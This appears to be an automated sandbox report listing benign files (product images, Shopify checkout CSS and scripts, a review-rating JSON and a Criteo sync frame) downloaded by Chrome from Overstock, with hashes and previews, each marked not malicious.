                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@........................................................................................................................................m5....o^~.y.................VY.*..1....X.s.cm..9..}}`..........<...\.I....L...0HeD
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (12847)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):12848
                                                                                                                                                          Entropy (8bit):5.218715515901815
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:7228D18B2B22DA6298EB9493D1175863
                                                                                                                                                          SHA1:FFFBE78B7FE44573640B8DC5EE62FD48828A933B
                                                                                                                                                          SHA-256:6D45F0D60087514FE5330FD16E9F4D19E212FF164844D2BF14BB11B3E4441055
                                                                                                                                                          SHA-512:28F2383FC6704FFAF9D03F48BC378C698D8AA2488F04E0E36F26002E39400AB4C77AC748E54C8F4E51FF34D8F49678A23E956E99F7A22255D619B11804D39CCC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/DeliveryMethodSelectorSection.DNerkzQV.css
                                                                                                                                                          Preview:.rdvNk{animation:_2RkQB .1s .25s linear 6;position:relative;width:24px}[dir=ltr] .rdvNk:after{right:.3rem}[dir=rtl] .rdvNk:after{left:.3rem}.rdvNk:after{content:"";position:absolute;top:-.2rem;height:.7rem;width:.7rem;background-color:var(--x-default-color-text);border:1px solid var(--x-default-color-background);border-radius:50%;animation:i0YRL .4s .85s both}@keyframes i0YRL{0%{opacity:0;transform:scale(.5)}40%{transform:scale(1.1)}to{opacity:1;transform:scale(1)}}@keyframes _2RkQB{0%,to{transform:rotate(10deg)}50%{transform:rotate(-10deg)}}.rMk2p{border-radius:var( --x-express-checkout-button-border-radius, var( --x-primary-button-border-radius, var(--x-global-border-radius, var(--x-border-radius-base)) ) )}.vT2w7{border:1px transparent solid;border-radius:var( --x-express-checkout-button-border-radius, var( --x-primary-button-border-radius, var(--x-global-border-radius, var(--x-border-radius-base)) ) );background-size:100% 60%;background-repeat:no-repeat;background-position:50% 50%}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 650x366, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):58364
                                                                                                                                                          Entropy (8bit):7.9547734027490336
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:FA9C7C7A521F558992CA1106E1BD1AA6
                                                                                                                                                          SHA1:EF369DFE5B56F38452FDBBD44F9D1B6BD76DD092
                                                                                                                                                          SHA-256:10837E7C93E475F00F77B3CA8C5CB75FFF91DF242BA3249122C1D7E13C2706F0
                                                                                                                                                          SHA-512:1D7EC45C5FABE6B80098A9142E30E9613AFC54D784D32AE3DA2745F5C047F711A84093B410AF9D58A9D510882431E3A529B46623EA837A9B8D98C21AA7B08F52
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f........2.......2................0210....................0100................................n...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......n............................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8753
                                                                                                                                                          Entropy (8bit):7.603624613272272
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:F666A5BDF507BD05C33A9FD643F5F0DE
                                                                                                                                                          SHA1:67DCA824BCFA4361D86E1EE1FC89FDFE96FAC16A
                                                                                                                                                          SHA-256:0C2AF0459E393A3F4D7A284B0E19617DB4D9B19061919843FC4C81E353B95CE6
                                                                                                                                                          SHA-512:BF7A360FD466992858F8F1A5D3B47D81BBEAD21401587C373097E168649AE2AF9596D65126F24F81A6E1FDBD7D81928D44D42B9C0ED1234EF4658CAC05EA99A1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@...........................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):278
                                                                                                                                                          Entropy (8bit):4.9143340189187565
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:688A714B0E1E48BD1370C7D61D509128
                                                                                                                                                          SHA1:CB68181328E224034EC5372E262E326BFBB28B5D
                                                                                                                                                          SHA-256:9E416637D6805204B00864F05487ACCBCA42BC0522CA09618A6466E09FF70D10
                                                                                                                                                          SHA-512:A5AC054303E4B05F91A04A7258337566D865824EEB0B0C393F1A71BC41AA72733DCBDB13C2A2B3E223B2609CE0EFDA71A5B724951DCAE671FF8485E4EF4B40DF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/useAmazonContact.D-Ox6Dnf.css
                                                                                                                                                          Preview:.sqcDF{z-index:200}.z2IIo{display:flex;align-items:center;padding:var(--x-option-list-block-padding) var(--x-option-list-inline-padding)}.qi1py{border-top:0;min-height:5.7rem}.pcf8k{border-top:1px var(--x-default-color-border) var(--option-list-border-style);min-height:7.4rem}.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):29820
                                                                                                                                                          Entropy (8bit):7.955033403002846
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:4FDF47A7CDE995D2331C5DD4615CF594
                                                                                                                                                          SHA1:25BB7C64CD8C9B0AF05AD587531BF88B2F509CF2
                                                                                                                                                          SHA-256:D7AB84E02738AD5BA651A3A162F329FBF329E28338798A33D175C95DBC225FDB
                                                                                                                                                          SHA-512:7D6A420DD1B3D58ECF65BFCBC8D9F582B2F868ACF16A402549EC3941ADA49807BCDEBEDEF24BD905619799299B18002088706B2DC2981CE2AEE45025D590792E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@....................................................................................]ota..:..F.G....r<...v.N.}_....WO..V.:D....p..... ;.G=.....D-......p.Lta..zel.I.......y.L.D..f...B]y8.(g5. <..6l.d.@.....p.....B.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):143
                                                                                                                                                          Entropy (8bit):4.662880623430497
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:550D5EA7CEF5A61E16CAA13C0352685D
                                                                                                                                                          SHA1:C48AEE6C4784BC7E203C5D0C6B083E056BB0E364
                                                                                                                                                          SHA-256:17088C95A71E4E59D21E54DBC057A011E0644794F1A15211E48EE69D29818C62
                                                                                                                                                          SHA-512:ECAE2D0FFAB5C170F699922357EC73A3314BAB0AD7630CEBAF055EF4EAE545A56D8744966C386C5BC8C04AB7D8BC8DD58084795460A7330E95DE0EEC8444BBC9
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/30815739/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                          Preview:{"name":"snippet","results":[{"page_id":"30815739","rollup":{"average_rating":4.43,"rating_count":7,"review_count":7,"answered_questions":0}}]}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):30320
                                                                                                                                                          Entropy (8bit):7.980399104686217
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:913D82D5278F7D2CC5203D26E75AE877
                                                                                                                                                          SHA1:E21E9FD5A2F9E703A580C4F0448218E4B499D8A4
                                                                                                                                                          SHA-256:5EF5B5DAD380402AC0C5BA33C05C12F4DBE87DE28E870E10E900FAEA5EDCEEB5
                                                                                                                                                          SHA-512:B5A961073030A80760293A2C268D8F46E98DBDED5371752BF6AC05E1B5927E84E80B56F960F4F89E76D8C736A39DE00E0401B90E29220CC1D5899B2A48834D23
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/SAFAVIEH-Amelia-Lorella-Abstract-Rug.jpg?v=1715196795&width=320
                                                                                                                                                          Preview:RIFFhv..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .s...F...*@.@.>9..C"!..... ....b..k....C.}.........x..Q...[.G.?.^..k.p=........a......Z....p..?Z.._.......~.{^..........GF.3yk.....|'./._.}.q..~.?@......._.?1...=.....?.{..o./................M.../.......]........E.....3.......?............O.O..........?....?a..v3.......3.u.......2....M.e..L1._.?..>#...Q.wi1.G.z(.(.iOH&.#?i].v...-(.\..-..(e..z.Cx,z....".s@.h5......S;h...b.....u..>C..r.T...,Q...........N.<."..*.......$5...S.....#.....N.4.I.SU.FJ.T..P..k...%.....C.1..~..4g.!......6.U..K....oJ$..w......Y!.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):42562
                                                                                                                                                          Entropy (8bit):7.9726690045562485
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:0C68D12BC8E41ECB15429695DCA3C527
                                                                                                                                                          SHA1:CBE3443D611393D50498CE156F81EE0FDECEC445
                                                                                                                                                          SHA-256:9B80979E79650E4B87299791F39EF24EB7C141EE74ACCB04A054B2F3550B3E5B
                                                                                                                                                          SHA-512:FE47F01C8CEBE344C97A35FED0E7DCF066834B5148D5209A49B2C105D8AE58451744AEAB03176590845AC372582BCA9E706BDD5FF5908FBB15A8BF65FFE4817C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@......................................................................................-.yz...:...>...l.g..3]'L.D[.#..dC.$.........<.;Dr...$p....R......O..._"5......0.k-..hYj...,.ai..k.v.Yh/G;.......Q.4...FQ.j....RkT
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):31454
                                                                                                                                                          Entropy (8bit):7.981035037148331
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:E70A8AD029B9F9384C273852A07CC9C8
                                                                                                                                                          SHA1:E3D17DDD3E767F2879EF8642CACD7D8523713889
                                                                                                                                                          SHA-256:A6741192AD0A3953DD1464B02F8BEB8CCFEFD7C3E5958B9C9B7B4673B72DC0D4
                                                                                                                                                          SHA-512:46FF0E3B3CAC1403E37FCD8DD72FC31A3303E054D49EE2DD4B97FCE3834D07D24AC207FC3013B153C6FFFBF5F206AC2CDEA486A512DEF3ABB4DC72CAE1589262
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/SAFAVIEH-Amelia-Madlaina-Abstract-Rug_298750b2-5ab0-4cee-aa4d-1977a4d43efe.jpg?v=1728145640&width=320
                                                                                                                                                          Preview:RIFF.z..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 Fx..p6...*@.@.>9..C"!!.... ......L...c..}C.R...o.?....w.7..P....?......a.........i...............e.%...C.c......m?....w...o..B.m...O..?..x...}C.{.....?t.#.3.w.'......_..G...?.z?./g6..3.7..`.m...../.....O....O.....?.?.4.........G.?.~.|..P...3.....?./.....}..............D..._.........~............}..$.*NI3...<].Bz&..!o.K..........lS....~..z@......n...g....^...l.........c@".......;X?.;wc.c.m.P.D......(..W..r..JD/@.^l..JzF.6p.B...N+<.YY.....1x..>....h.....h.....P.K&....{..tA"P.{P.....cd.g>!......k....76..!
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):15852
                                                                                                                                                          Entropy (8bit):7.950603377805367
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:43701A6E7556B1A10128583F1E3DB5D2
                                                                                                                                                          SHA1:2E9A2083DE3B3C9D701C2DE7DA4006544881A524
                                                                                                                                                          SHA-256:008B1B63F6FF7452E20FE4D2D8C645ACC72DF2E33AAEDFB945F775E34B22F61E
                                                                                                                                                          SHA-512:03557492B11E14A36FACA91AC13FAD8E02F94CDF56F0C5EE645D009CB5F7B531767765A90084A6A694FBB6F1CBD285FAB92C3E7965AA6C9DE27E7927BBB9BF33
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/collections/Acroma-20-light-Modern-Farmhouse-40In-Round-Wagon-Wheel-Chandelier.jpg?v=1710950168&width=320
                                                                                                                                                          Preview:RIFF.=..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 T;......*@.@.>9..D"!...0 .....*5...jo..#..^..;..w.........?...>....7y..L.Y.......)_X........{.. ...]...C..g.O..k.P...c.7............g..i...;..?y.=.....w.....|7..._...?.~c~g...?....W.....?....................&.....B./.......?..&.^.K......._....P.....I.{........~V}..8.......o.....a...%.s...'........>.n.E.......e......ow.=5..;3..u......(..R{.....v.O..|.......PC........ut.9.m..L.K.1n.........g....Fz...<.&6.._.``..X.."F..lV..\..._.=..Jb...((..w4..(+.^.........N.k......T.p..[+\1..?b.E..1..'/y.....F...vs.".
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):21140
                                                                                                                                                          Entropy (8bit):7.937814177406653
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:40067220C5EA4DC23D374CAEFDC86F0F
                                                                                                                                                          SHA1:46EF18095E1EE0566B20794091991D8F91695657
                                                                                                                                                          SHA-256:F7DCA96ADD54AFD118E2153EA7B5F6B3DD1FFFA4AA4CC134CC322021BF517638
                                                                                                                                                          SHA-512:7D623318F7C874AB19EC5CB24F8822554CEDED24FDC3B30B4F44EBEB0F84327A6DB5996DEAA5AF64636A33DA017D270A152FDA6ACA50CB11749E01EC9F24025A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@....................................................................................t...'A.D..B.MI.aP.t!.........!:.N....H.!.B(.\.rT .B..!.B.....].(d!..!..!.D..H...6.B..!.".. .h.4Bt..:...*. .4j|.gg...BJ....B........PB
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):99169
                                                                                                                                                          Entropy (8bit):5.068920914318602
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:96C13305D494179562DE98C1F07F2234
                                                                                                                                                          SHA1:B79AE04CEED22DB5538579DA020A297157607A4B
                                                                                                                                                          SHA-256:A1E7261E73ABEDC1D566AD8EFBC45DAEE86EF5CECBE12E857B772B773FCCFD19
                                                                                                                                                          SHA-512:B99D22C0905DE5BE8BEB3A3B243AA48FC27109A391BBD90909B0C38E983008A385B642853CD9CCADF2654ACB63D08F26E5BD72C564CEF1BCFE7233E26E2DF985
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/main.css?v=96212936053783712681729144463
                                                                                                                                                          Preview:@charset "UTF-8";*,*:before,*:after{box-sizing:border-box}.announcment_logos .main-menu-bar{display:flex;align-items:center}.announcment_logos .main-menu-bar a{padding:0}.pb-6.flex.flex-col.flex-auto.items-start{background:#fff}.card.color-scheme.color-scheme--1.relative.flex.flex-col.h-full{border:1px solid #00000005;box-shadow:0 0 4px 4px #00000005}ul.slider__grid{padding:10px}.section__block--countdown.text-overlay__block{display:flex;flex-direction:column;justify-content:center;align-items:center;background:#fff}.section__block--countdown.text-overlay__block a{background:#d90023;color:#fff;width:200px;height:50px;display:flex;justify-content:center;align-items:center;margin-top:20px;font-size:16px;font-weight:700;letter-spacing:.1px}.section__block--countdown.text-overlay__block .countdown__number{border-radius:50%;background:#d90023}#productSpecifications{background:#5a5a5a;justify-content:space-evenly!important;align-items:center!important;gap:20px;padding:100px 0}#productSpecifi
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 320 x 320, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):55253
                                                                                                                                                          Entropy (8bit):7.984378772044162
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:3D97E1DAAC7A01C3964CE655C14D8334
                                                                                                                                                          SHA1:92785A67D37E0B4F192DB410912C5AF1217A4E66
                                                                                                                                                          SHA-256:A4003838399E192E518B57C5383CF5F6FBA5DD12FF41E7C77349E4DD5B104DB6
                                                                                                                                                          SHA-512:85C88C1153568BFB00615A2C896757703A87A0515C035619720B8B65B49A15B71E31821D6C82623EAEBABB11AD1F58BF3AFC15E5BF87727B9E44A451DCBCFF83
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:.PNG........IHDR...@...@............iCCPicc....c``\...[.$....WR........~...A...A..21...1 ...'.v...D_....@..LI-Nf``......\PT...........```.)...b``....!...;...V..............NBbC....d..Ld.$...A.R.....O2'.N....&`/.(m..Qs....$7......U...g..._{..K...KR+J@.....@a..6...E..._...' .f20loe`....SY........<...M...Ft....eXIfII*...........................V...........^...(.......................i.......f.......x2......x2................0210....................0100....................@...........@.......n.1.....pHYs...%...%.IR$... .IDATx..w|......z/66..SCo....%..j.JB.n.+..c.+...5....N.zo...z7.X.K.3...xovgW+Yn.l..#.........s..D...:.W.!..|....w...@!P...T...r.......".u../..Z.b|_...../.!..}..m.~...(wpU..=...i.B4k.....@.Pk?..?h...!:..^.Y.2.V.a.........R. .vX...E.e.....c#`.0...../.P.~... @{?.....x.]Z....U..b..~,B.......$`g.........B.[.3.....Ak....9.."P..0.5-..eu.^.*................P...AF.:......@)....x.].n..:^.%...)5....M.l.+..&R...>...u.."|.R,.......>.Z.../...e&HK@h......(F...j.z
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (18747)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):18762
                                                                                                                                                          Entropy (8bit):5.182766319203465
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:469BA1404BC55684B8C97ED4244E987B
                                                                                                                                                          SHA1:96E68AE3093847C3364F5A859AFEEC19E258B8F4
                                                                                                                                                          SHA-256:0339974E1AD182755334D2ED3F5E266D7E146ED05F118B49A9C104B330FD9034
                                                                                                                                                          SHA-512:CBBE58D7D6EF1898FFD44A08D4DBC98213328C28DE666E4643FCC1D070752CC00117733B943EEE1D4C07F01FC193AEFC48D2D6B5E15DB919BDC473025B6E8B44
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shopifycloud/perf-kit/shopify-perf-kit-1.0.0.min.js
                                                                                                                                                          Preview:!function(){"use strict";var e,t=function(){return window.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0]},n=function(e){if("loading"===document.readyState)return"loading";var n=t();if(n){if(e<n.domInteractive)return"loading";if(0===n.domContentLoadedEventStart||e<n.domContentLoadedEventStart)return"dom-interactive";if(0===n.domComplete||e<n.domComplete)return"dom-content-loaded"}return"complete"},r=function(e){var t=e.nodeName;return 1===e.nodeType?t.toLowerCase():t.toUpperCase().replace(/^#/,"")},o=function(e,t){var n="";try{for(;e&&9!==e.nodeType;){var o=e,i=o.id?"#"+o.id:r(o)+(o.classList&&o.classList.value&&o.classList.value.trim()&&o.classList.value.trim().length?"."+o.classList.value.trim().replace(/\s+/g,"."):"");if(n.length+i.length>(t||100)-1)return n||i;if(n=n?i+">"+n:i,o.id)break;e=o.parentNode}}catch(e){}return n},i=-1,a=function(){return i},s=function(e){addEventListener("pageshow",(function(t){t.persisted&&(i=t.timeStamp,e(t))}),!
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (14394)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):14706
                                                                                                                                                          Entropy (8bit):5.4205091835205925
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:D4B1B65CB91E146E8AD42571060AFDAC
                                                                                                                                                          SHA1:08BA322F600D9B6927A25EF9E9E426D946CDB624
                                                                                                                                                          SHA-256:45F8135B8AEEDEFF283C4057E5056C6839A30B380F13E3D663A1A0AF7FB7C7D8
                                                                                                                                                          SHA-512:B025AD62FD0F8686038A9DC73703CAC0964D492ED075B755770AA2935DEBA36EE051B9EBB357EA664AFE3EC08EF678E2C692360A53CE73EA1C62779A4EB432A0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://gum.criteo.com/syncframe?topUrl=www.overstock.com&origin=onetag
                                                                                                                                                          Preview:<!DOCTYPE html>.<html>.<head>. <script type="text/javascript">. window.CONFIG_CSM_DOMAIN_NAME = "csm.nl3.eu.criteo.net";. window.CONFIG_CSM_RATIO = 100;. window.GUM_DOMAIN = "gum.criteo.com";. </script>. <script type="text/javascript">. !function(){"use strict";var i=function(t,e){return(i=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var n in e)e.hasOwnProperty(n)&&(t[n]=e[n])})(t,e)};function t(t,e){function n(){this.constructor=t}i(t,e),t.prototype=null===e?Object.create(e):(n.prototype=e.prototype,new n)}var e=function(){return(e=Object.assign||function(t){for(var e,n=1,i=arguments.length;n<i;n++)for(var o in e=arguments[n])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t}).apply(this,arguments)};function n(r,s,a,l){return new(a=a||Promise)(function(t,e){function n(t){try{o(l.next(t))}catch(t){e(t)}}function i(t){try{o(l.throw(t))}catch(t){e(t)}}function o(e){e.done?t(e.valu
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Java source, ASCII text, with very long lines (6320)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):6321
                                                                                                                                                          Entropy (8bit):5.326022784169933
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:FEE3DBF22E45E9943DCD70C972ABB3BD
                                                                                                                                                          SHA1:6C78D1612E9DA56F716F7BF461F34C540D9605D7
                                                                                                                                                          SHA-256:577910AE0D80F501B31B1EB90CD90E1D31280E0F48FA2C2DF3F37D3FE1A574DE
                                                                                                                                                          SHA-512:D4428F15A85F961DAE450250D6FBE943AEFDE11C0049AFA0BA70955F9E720D74787B9CA1DD94124EE65CA986A2B73FC3A44BEC9D6208CCE8B6EE985F7B35F4FC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/PickupPointCarrierLogo.C-y5TkoQ.js
